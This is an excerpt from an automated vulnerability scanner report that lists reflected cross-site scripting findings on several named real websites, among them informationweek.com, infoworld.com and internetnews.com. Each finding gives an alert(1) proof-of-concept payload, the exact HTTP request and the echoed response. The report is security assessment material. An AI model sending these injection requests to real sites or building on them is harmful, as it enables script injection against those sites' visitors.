HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:21 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:21 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=D4OPXK1R0SWNJQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32659
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news9482c"><script>alert(1)</script>c74652cf427/software/s;kvarticleid=;kvauthor=;loc=300;grp=875003964" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6550a"><script>alert(1)</script>1f904487184 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software6550a"><script>alert(1)</script>1f904487184/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=ZMGKRGBS1LZLFQE1GHRSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32180
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/software6550a"><script>alert(1)</script>1f904487184/s;kvarticleid=;kvauthor=;loc=300;grp=294957389" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62210'-alert(1)-'bab95806b75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software62210'-alert(1)-'bab95806b75/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:24 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:24 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=5KMGLVA4Y0M4LQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32070
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/software62210'-alert(1)-'bab95806b75/showArticle;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=724721911;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ff5"><script>alert(1)</script>27a16567aaa was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software/showArticle.jhtml?articleID=225700879f9ff5"><script>alert(1)</script>27a16567aaa HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=HMZ4JHAJE5NQJQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33766
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/software/showArticle.jhtml?articleID=225700879f9ff5"><script>alert(1)</script>27a16567aaa"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7268'%3balert(1)//bcbcc08f31c was submitted in the articleID parameter. This input was echoed as d7268';alert(1)//bcbcc08f31c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/showArticle.jhtml?articleID=225700879d7268'%3balert(1)//bcbcc08f31c HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=I3SROGCOXOGRVQE1GHRSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33353
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700879d7268';alert(1)//bcbcc08f31c+/news/software/showArticle/dhandler;kvarticleid=225700879d7268';alert(1)//bcbcc08f31c;kvauthor=;loc=100;target=_blank;grp=534116439;misc='+new Date().getTime()+'"> ...[SNIP]...
1.80. http://www.informationweek.com/news/software/showArticle.jhtml [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.informationweek.com
Path:
/news/software/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6df8"><script>alert(1)</script>82ef9697c7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software/showArticle.jhtml?articleID=225700879&f6df8"><script>alert(1)</script>82ef9697c7c=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:15:36 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:36 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=KSVOKGDGW15ZBQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 80199
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/software/showArticle.jhtml?articleID=225700879&f6df8"><script>alert(1)</script>82ef9697c7c=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b37c"><script>alert(1)</script>3d935b0d726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article8b37c"><script>alert(1)</script>3d935b0d726/08/02/25/E-scammers-trashing-reputations_1.html HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:40 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Sat, 11 Dec 2010 02:15:40 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292033740-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48543
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f6ea"><script>alert(1)</script>e1fee3bb966 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/083f6ea"><script>alert(1)</script>e1fee3bb966/02/25/E-scammers-trashing-reputations_1.html HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Sat, 11 Dec 2010 02:15:44 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292033744-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48543
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd7fa"><script>alert(1)</script>7ac2162aa3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/08/02dd7fa"><script>alert(1)</script>7ac2162aa3f/25/E-scammers-trashing-reputations_1.html HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:47 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Sat, 11 Dec 2010 02:15:47 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292033747-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48543
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d436"><script>alert(1)</script>67ecd26807e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/08/02/251d436"><script>alert(1)</script>67ecd26807e/E-scammers-trashing-reputations_1.html HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:50 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Sat, 11 Dec 2010 02:15:50 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292033750-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48543
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9def9"><script>alert(1)</script>a4a42968d56 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/08/02/25/E-scammers-trashing-reputations_1.html9def9"><script>alert(1)</script>a4a42968d56 HTTP/1.1 Host: www.infoworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.8 X-Drupal-Cache: MISS Last-Modified: Sat, 11 Dec 2010 02:15:53 +0000 Cache-Control: public, max-age=0, public, max-age=600 ETag: "1292033753-0" Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48543
The value of the Itemid request parameter is copied into an HTML comment. The payload acefe-->0ea91af9119 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=11&parentid=1543&Itemid=67acefe-->0ea91af9119&getcontent=2 HTTP/1.1 Host: www.inta.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the catid request parameter is copied into an HTML comment. The payload 5aa90-->e4cb2f60c85 was submitted in the catid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=115aa90-->e4cb2f60c85&parentid=1543&Itemid=67&getcontent=2 HTTP/1.1 Host: www.inta.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the catid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49b30"%20style%3dx%3aexpression(alert(1))%201124fec0b65 was submitted in the catid parameter. This input was echoed as 49b30\" style=x:expression(alert(1)) 1124fec0b65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=1149b30"%20style%3dx%3aexpression(alert(1))%201124fec0b65&parentid=1543&Itemid=67&getcontent=2 HTTP/1.1 Host: www.inta.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the getcontent request parameter is copied into an HTML comment. The payload 7dcdc-->18ba3115fa6 was submitted in the getcontent parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=11&parentid=1543&Itemid=67&getcontent=27dcdc-->18ba3115fa6 HTTP/1.1 Host: www.inta.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into an HTML comment. The payload 1a427-->1f145170a99 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=15441a427-->1f145170a99&catid=11&parentid=1543&Itemid=67&getcontent=2 HTTP/1.1 Host: www.inta.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.91. http://www.inta.org/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.inta.org
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4ae9a--><a>d46878f478e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=11&parentid=1543&Itemid=67&getcontent=2&4ae9a--><a>d46878f478e=1 HTTP/1.1 Host: www.inta.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the parentid request parameter is copied into an HTML comment. The payload 9ac59-->1e701364a4f was submitted in the parentid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=11&parentid=15439ac59-->1e701364a4f&Itemid=67&getcontent=2 HTTP/1.1 Host: www.inta.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the task request parameter is copied into an HTML comment. The payload c2255-->07a7855964b was submitted in the task parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetailsc2255-->07a7855964b&id=1544&catid=11&parentid=1543&Itemid=67&getcontent=2 HTTP/1.1 Host: www.inta.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.94. http://www.internetevolution.com/author.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.internetevolution.com
Path:
/author.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22722"><script>alert(1)</script>c870c6a6705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /author.asp?section_id=949&doc_id=190224&f_src=internetevolution_gnews&22722"><script>alert(1)</script>c870c6a6705=1 HTTP/1.1 Host: www.internetevolution.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907f7"><img%20src%3da%20onerror%3dalert(1)>cab9a87042 was submitted in the REST URL parameter 3. This input was echoed as 907f7"><img src=a onerror=alert(1)>cab9a87042 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /security/article.php/3789956907f7"><img%20src%3da%20onerror%3dalert(1)>cab9a87042/Report+Warns+of+More+Cybercrime.htm HTTP/1.1 Host: www.internetnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:16:33 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 97065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80828"><img%20src%3da%20onerror%3dalert(1)>82f26ad946e was submitted in the REST URL parameter 4. This input was echoed as 80828"><img src=a onerror=alert(1)>82f26ad946e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /security/article.php/3789956/Report+Warns+of+More+Cybercrime.htm80828"><img%20src%3da%20onerror%3dalert(1)>82f26ad946e HTTP/1.1 Host: www.internetnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:17:04 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 156223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62a8"%20style%3dx%3aexpression(alert(1))%20426e64acc81 was submitted in the REST URL parameter 3. This input was echoed as f62a8" style=x:expression(alert(1)) 426e64acc81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /security/article.php/3818166f62a8"%20style%3dx%3aexpression(alert(1))%20426e64acc81/Facebook+Fights+Second+Phishing+Attack.htm HTTP/1.1 Host: www.internetnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:16:41 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 97073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e405"><img%20src%3da%20onerror%3dalert(1)>04e58aae264 was submitted in the REST URL parameter 4. This input was echoed as 1e405"><img src=a onerror=alert(1)>04e58aae264 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /security/article.php/3818166/Facebook+Fights+Second+Phishing+Attack.htm1e405"><img%20src%3da%20onerror%3dalert(1)>04e58aae264 HTTP/1.1 Host: www.internetnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:17:15 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 154430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.99. http://www.investors.com/NewsAndAnalysis/Article/542148/201007301734/Newest-Name-Extension-Dot-Co-Attracting-Buyers-.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25511"><script>alert(1)</script>e4bcefe05c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NewsAndAnalysis/Article/542148/201007301734/Newest-Name-Extension-Dot-Co-Attracting-Buyers-.aspx?25511"><script>alert(1)</script>e4bcefe05c3=1 HTTP/1.1 Host: www.investors.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.100. http://www.investors.com/NewsAndAnalysis/Article/542152/201007301734/Cybersquatters-Camp-At-Dot-Com-.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5484b"><script>alert(1)</script>5d849295bff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NewsAndAnalysis/Article/542152/201007301734/Cybersquatters-Camp-At-Dot-Com-.aspx?5484b"><script>alert(1)</script>5d849295bff=1 HTTP/1.1 Host: www.investors.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.101. http://www.isnic.is/about/terms.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isnic.is
Path:
/about/terms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50136"><script>alert(1)</script>c47723f4262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/terms.php?50136"><script>alert(1)</script>c47723f4262=1 HTTP/1.1 Host: www.isnic.is Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:16:53 GMT Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch X-Powered-By: PHP/5.3.3 Cache-Control: private must-revalidate Set-Cookie: PHPSESSID=7a8f922197308131779f30a9a8046677; path=/ Connection: close Content-Type: text/html Content-Length: 24180
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="is">
1.102. http://www.itbusinessedge.com/cm/community/news/sec/blog/facebook-gets-security-help-from-markmonitor/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac634"><ScRiPt>alert(1)</ScRiPt>de16193bc6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
